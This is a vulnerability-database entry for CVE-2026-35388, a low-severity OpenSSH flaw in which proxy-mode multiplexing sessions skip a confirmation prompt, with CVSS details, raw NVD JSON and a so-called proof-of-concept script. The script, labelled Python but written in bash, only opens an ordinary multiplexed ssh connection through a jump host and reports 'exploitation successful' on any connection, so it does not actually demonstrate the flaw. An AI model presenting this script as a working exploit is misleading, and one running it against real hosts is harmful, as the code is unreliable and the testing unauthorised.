Security Vulnerability Report
中文
CVE-2026-35388 CVSS 2.5 LOW

CVE-2026-35388

Published: 2026-04-02 17:16:28
Last Modified: 2026-04-27 14:12:18
Source: [email protected]

Description

OpenSSH before 10.3 omits connection multiplexing confirmation for proxy-mode multiplexing sessions.

CVSS Details

CVSS Score
2.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:* - VULNERABLE
OpenSSH < 10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # PoC for CVE-2026-35388: OpenSSH Proxy Mode Multiplexing Confirmation Bypass # This script demonstrates the behavior where confirmation for multiplexing is omitted. # Requires a vulnerable version of OpenSSH (< 10.3) and a target environment. TARGET_USER="testuser" TARGET_HOST="example.com" PROXY_HOST="proxy.example.com" # Set up ControlMaster for multiplexing SSH_OPTS="-o ControlMaster=yes -o ControlPath=/tmp/cve_2026_35388_%r@%h:%p -o ControlPersist=10m" echo "[*] Attempting to establish a multiplexed connection via proxy..." # In vulnerable versions, this command may proceed without prompting the user # for confirmation of the multiplexed session setup through the proxy. ssh $SSH_OPTS -J $PROXY_HOST $TARGET_USER@$TARGET_HOST "echo 'Connection established via multiplexing'" if [ $? -eq 0 ]; then echo "[+] Potential exploitation successful: Connection established without explicit confirmation." else echo "[-] Connection failed or target patched." fi # Cleanup control socket ssh -O exit $SSH_OPTS -J $PROXY_HOST $TARGET_USER@$TARGET_HOST 2>/dev/null

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35388", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:27.947", "lastModified": "2026-04-27T14:12:17.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSSH before 10.3 omits connection multiplexing confirmation for proxy-mode multiplexing sessions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-420"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.3", "matchCriteriaId": "F40F50BC-86AA-4D7F-88A5-A244CD7606F3"}]}]}], "references": [{"url": "https://marc.info/?l=openssh-unix-dev&m=177513443901484&w=2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.openssh.org/releasenotes.html#10.3p1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/02/3", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.